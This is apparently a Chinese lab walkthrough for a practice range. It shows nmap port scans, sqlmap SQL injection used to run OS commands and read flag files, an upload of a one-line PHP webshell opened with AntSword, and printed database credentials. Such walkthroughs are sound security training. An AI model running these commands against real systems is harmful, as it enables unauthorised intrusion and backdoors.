第一关得出的链接,它对应的端口就是flag
这里有点小彩蛋,我们可以通过子域名收集得到的ip地址,来进行端口扫描,从而拿到隐藏靶场
nmap命令
nmap 1.1.1.1 -v
namp 1.1.1.1 -p 8000-8300 -v
flag在robots.txt文件里
在single.php里测试到id存在注入,并且输入单引号时,发现了绝对路径
直接
sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --is-dba --batch
起飞,发现它是dba权限,我们可以干anythings,并且通过路径判定windows系统
sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-cmd=whoami
这里执行cmd命令,可以执行成功
sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-cmd=dir
列出文件先瞄一眼,太激动了.hhh,发现了一个flag.php文件
sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --os-cmd="type flag.php"
一不小心得到了最后一关的flag
sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --file-write="hacker.php" --file-dest="C:/phpStudy/WWW/hacker.php"
传个一句话木马上去,用蚁剑看看
#$conn = mysqli_connect("127.0.0.1","root","root","cake");
$conn = mysqli_connect("127.0.0.1","cake","Cake0001","cake");
然后右键数据库管理。注意:进去之后直接点击不会出现数据,要自己输入语句才会出数据
一不小心上一关拿到了flag
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.